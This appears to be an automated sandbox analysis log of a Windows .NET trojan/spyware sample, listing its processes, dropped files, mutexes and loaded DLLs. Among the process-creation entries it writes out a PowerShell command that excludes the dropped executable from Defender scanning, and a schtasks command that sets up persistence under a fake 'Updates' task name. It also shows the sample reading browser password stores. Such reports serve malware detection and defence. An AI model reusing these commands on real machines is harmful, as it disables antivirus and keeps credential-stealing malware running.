                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, Pi1jAIH7qx7MOMF9DX.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, Pi1jAIH7qx7MOMF9DX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, Pi1jAIH7qx7MOMF9DX.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/16@4/5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeFile created: C:\Users\user\AppData\Roaming\vQzHzddZ.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMutant created: \Sessions\1\BaseNamedObjects\rfJBvZCjeBBrNfClSLrkz
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE4F1.tmpJump to behavior
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.0000000002A7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.0000000002A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeVirustotal: Detection: 51%
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\vQzHzddZ.exe C:\Users\user\AppData\Roaming\vQzHzddZ.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEF03.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEF03.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
